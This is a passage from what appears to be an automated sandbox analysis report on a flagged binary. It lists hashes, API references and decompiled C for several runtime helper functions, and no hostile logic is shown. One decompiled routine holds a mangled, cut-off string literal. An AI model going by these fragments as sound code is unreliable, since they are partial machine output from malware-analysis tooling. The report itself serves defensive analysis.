                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                • String ID: csm
                                                                                • API String ID: 803148776-1018135373
                                                                                • Opcode ID: 7498bb2d42a279d00827fb68dc5e25441d99e1685884e4f95cd15346bb64ca00
                                                                                • Instruction ID: 065e5224e706152be8a24a8500039992b796e4889236b2196d4c28aee3306f25
                                                                                • Opcode Fuzzy Hash: 7498bb2d42a279d00827fb68dc5e25441d99e1685884e4f95cd15346bb64ca00
                                                                                • Instruction Fuzzy Hash: A0012C34A01225AACF349F61E440A6EB7B9AF10316F94442FE481563A1CB7D9E81CA6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00C7372B: __getptd.LIBCMT ref: 00C73731
                                                                                  • Part of subcall function 00C7372B: __getptd.LIBCMT ref: 00C73741
                                                                                • __getptd.LIBCMT ref: 00C7C0F9
                                                                                  • Part of subcall function 00C771DA: __getptd_noexit.LIBCMT ref: 00C771DD
                                                                                  • Part of subcall function 00C771DA: __amsg_exit.LIBCMT ref: 00C771EA
                                                                                • __getptd.LIBCMT ref: 00C7C107
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                • String ID: csm
                                                                                • API String ID: 803148776-1018135373
                                                                                • Opcode ID: 90b0284b966645cfb4c0733fa0c2a899ac638c4b2b33f9f58db1b17bb52fe2ec
                                                                                • Instruction ID: 419f113286d394425081abf338914eb13016cf72f3793188518da132dc6f6f29
                                                                                • Opcode Fuzzy Hash: 90b0284b966645cfb4c0733fa0c2a899ac638c4b2b33f9f58db1b17bb52fe2ec
                                                                                • Instruction Fuzzy Hash: B30128748012068BCF289F24D581AADB7B5AF10311F94D82DE86C56253DB30DE85EB81
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • std::bad_exception::bad_exception.LIBCMTD ref: 00C70A60
                                                                                  • Part of subcall function 00C63CF0: std::runtime_error::runtime_error.LIBCPMTD ref: 00C63CFE
                                                                                • __CxxThrowException@8.LIBCMT ref: 00C70A6E
                                                                                  • Part of subcall function 00C733AB: RaiseException.KERNEL32(?,?,00C7316D,00C71293,?,?,?,?,00C7316D,00C71293,00DAB120,00DAD428,00C71293,00000000,00000000), ref: 00C733ED
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exceptionstd::runtime_error::runtime_error
                                                                                • String ID: vector<T> too long
                                                                                • API String ID: 212174158-3788999226
                                                                                • Opcode ID: 0b01444175902f4e38a3bd2c4b55bae1d17f15b0e54877f109ac4627e2ac152a
                                                                                • Instruction ID: 5f95a70504eabf9aee7aeba7f3baa0010bc4aa79a6d316ceb31e9a84414df679
                                                                                • Opcode Fuzzy Hash: 0b01444175902f4e38a3bd2c4b55bae1d17f15b0e54877f109ac4627e2ac152a
                                                                                • Instruction Fuzzy Hash: A6F0AF71810648ABCB10DFD0DD82B9EB778FB01720F00472DF412672C0EB306A08CB50
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 58%
                                                                                			E00404007(void* __ecx, void* __edi, void* __esi) {
                                                                                				signed int _v8;
                                                                                				char _v20;
                                                                                				void* _t8;
                                                                                				void* _t14;
                                                                                				void* _t18;
                                                                                
                                                                                				_t8 = 0;
                                                                                				if(__ecx != 0) {
                                                                                					_t22 = __ecx - 0x7fffffff;
                                                                                					if(__ecx > 0x7fffffff) {
                                                                                						L3:
                                                                                						_v8 = _v8 & 0x00000000;
                                                                                						E0041E15E( &_v20,  &_v8);
                                                                                						_v20 = 0x43834c;
                                                                                						return E00421126( &_v20, "h\xef\xbf\					}
                                                                                					_t8 = E0041EB16(_t14, _t18, __edi, __esi, _t22, __ecx + __ecx);
                                                                                					if(0 == 0) {
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				return _t8;
                                                                                			}









                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 00404034
                                                                                • __CxxThrowException@8.LIBCMT ref: 00404049
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                • String ID: hAD
                                                                                • API String ID: 4063778783-4020614360
                                                                                • Opcode ID: ef50aa0d5531f934dc069faca0b00111cb2420a90fb0de7e891e2ced0e2482ba
                                                                                • Instruction ID: 4abb3becd7b6b56fa68245c00a87f07a767a513609678ce51b05836b1298f837
                                                                                • Opcode Fuzzy Hash: ef50aa0d5531f934dc069faca0b00111cb2420a90fb0de7e891e2ced0e2482ba
                                                                                • Instruction Fuzzy Hash: C1E092B490021A96DB10F7A5CD02AEF73BC6F44328F60056FE621F35C1EFB8D6058699
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00419C2F(void* __eflags, CHAR* _a4) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t26;
                                                                                				void* _t28;
                                                                                				short* _t29;
                                                                                				int _t31;
                                                                                				CHAR* _t32;
                                                                                				void* _t33;
                                                                                
                                                                                				_t33 = __eflags;
                                                                                				_t32 = _a4;
                                                                                				_t31 = MultiByteToWideChar(0, 0, _t32, lstrlenA(_t32), 0, 0);
                                                                                				_t26 = 2;
                                                                                				_t2 = _t31 + 1; // 0x1
                                                                                				_t29 = E0041EB16(lstrlenA, _t2 * _t26 >> 0x20, _t28, _t31, _t33,  ~(0 | _t33 > 0x00000000) | _t2 * _t26);
                                                                                				MultiByteToWideChar(0, 0, _t32, lstrlenA(_t32), _t29, _t31);
                                                                                				_t29[_t31] = 0;
                                                                                				return _t29;
                                                                                			}













                                                                                APIs
                                                                                • lstrlenA.KERNEL32(00440C98,00000000,00000000,00440C98,?,?,00000000,0041C671,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00440C98), ref: 00419C42
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00440C98,00000000,?,00000000,0041C671,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00440C98,?), ref: 00419C48
                                                                                  • Part of subcall function 0041EB16: _malloc.LIBCMT ref: 0041EB30
                                                                                • lstrlenA.KERNEL32(00440C98,00000000,00000000,?,00000000,0041C671,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00440C98,?,0041CC7B), ref: 00419C6D
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00440C98,00000000,?,00000000,0041C671,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00440C98,?), ref: 00419C75
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWidelstrlen$_malloc
                                                                                • String ID:
                                                                                • API String ID: 478923669-0
                                                                                • Opcode ID: 8f61b424d6165e82e86f9827afb85f91beb2be794cc9e8135f4c3884e5a8dc00
                                                                                • Instruction ID: bd6b4f08c05a39c93edd4c3188b159cc0bbd8dc5c1d7c33d4e998ae2d02428cf
                                                                                • Opcode Fuzzy Hash: 8f61b424d6165e82e86f9827afb85f91beb2be794cc9e8135f4c3884e5a8dc00
                                                                                • Instruction Fuzzy Hash: 8AF054772012147FD224573A9C49F7BBB9CDF856B1F01412AFA0AC6180D9217C0482B4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%